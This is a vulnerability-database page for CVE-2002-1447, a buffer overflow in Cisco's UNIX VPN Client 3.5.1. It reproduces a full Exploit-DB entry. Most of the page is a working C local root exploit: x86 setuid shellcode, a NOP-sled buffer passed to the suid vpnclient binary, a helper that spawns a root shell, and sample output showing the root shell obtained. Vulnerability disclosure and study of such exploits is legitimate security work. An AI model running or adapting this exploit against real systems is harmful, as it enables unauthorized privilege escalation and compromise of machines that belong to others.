CVE-2002-1447 : Detail

CVE-2002-1447

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2004-09-01
02h00 +00:00
2003-03-21
09h00 +00:00
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CVE Descriptions

Buffer overflow in the vpnclient program for UNIX VPN Client before 3.5.2 allows local users to gain administrative privileges via a long profile name in a connect argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

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EPSS Score

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Exploit information

Exploit Database EDB-ID : 21568

Publication date : 2002-06-18 22h00 +00:00
Author : methodic
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/5056/info The Cisco VPN Client software is used to establish Virtual Private Network (VPN) connections between client machines and a Cisco VPN Concentrator. A vulnerability has been reported in some versions of the VPN Client. If an oversized profile name is passed to the vpnclient binary, a buffer overflow condition may occur. As vpnclient runs suid root, exploitation of this vulnerability will grant a local attacker root access to the vulnerable system. This vulnerability affects the VPN Client version 3.5.1 for Linux, Solaris and Mac OS X. Windows clients are not believed to be vulnerable. Earlier versions of the VPN Client may share this vulnerability, although this has not been confirmed. /* buffer overflow for cisco's vpnclient for linux tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz to get this to properly work, you need to put the following code into xx.c, compile it (as xx), and place the executable into /tmp (to bypass tight PAM restrictions) #include <stdio.h> main() { setuid(0); execl("/bin/sh", "sh", NULL); } then compile this and run it. syntax is ./vpnclient <offset> tested under gentoo linux and debian: $ ls -la `which vpnclient` -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient $ ./vpnKILLient addr: 0xbffffbac, offset: 0 Cisco Systems VPN Client Version 3.5.1 (Rel) Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved. Client Type(s): Linux Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686 sh-2.05a# id uid=0(root) gid=100(users) groups=100(users),10(wheel) greetz: all of the angrypacket crew (of course) shok -> pheerable^2; vegac -> 31336++; when you get a chance, check out http://sec.angrypacket.com */ #include <stdio.h> #include <string.h> #include <unistd.h> #define NOP 0x90 #define LEN 620 /* 520 to own eip */ /* shellcode by vegac (setuid(0)->/tmp/xx) */ /* wont work if your /tmp partition is mounted noexec or nosuid */ char shell[]= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x78\x78" "\x68\x2f\x74\x6d\x70\x89\xe3\x31" "\xc0\x50\x89\xe2\x54\x89\xe1\xb0" "\x0b\xcd\x80\x00"; unsigned long get_sp (void) { __asm__("mov %esp,%eax"); } int main(int argc, char *argv[]) { int i, offset=0; long addr; char *buf, *ptr; if(argc > 1) offset = atoi(argv[1]); buf = (char *)malloc(sizeof(char) * LEN); bzero(buf, LEN); addr = get_sp() - offset; printf("addr: 0x%x, offset: %d\n", addr, offset); for(i = 0; i < LEN; i += 4) { *(long *)&buf[i] = addr; } for(i = 0; i < (LEN / 2); i++) { *(buf + i) = NOP; } ptr = buf + ((LEN / 2) - (strlen(shell) / 2)); for(i = 0; i < strlen(shell); i++) { *(ptr++) = shell[i]; } buf[LEN - 1] = '\0'; execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0); return(0); }

Products Mentioned

Configuraton 0

Cisco>>Vpn_client >> Version To (including) 3.5.1

References

http://online.securityfocus.com/archive/1/277653
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/5056
Tags : vdb-entry, x_refsource_BID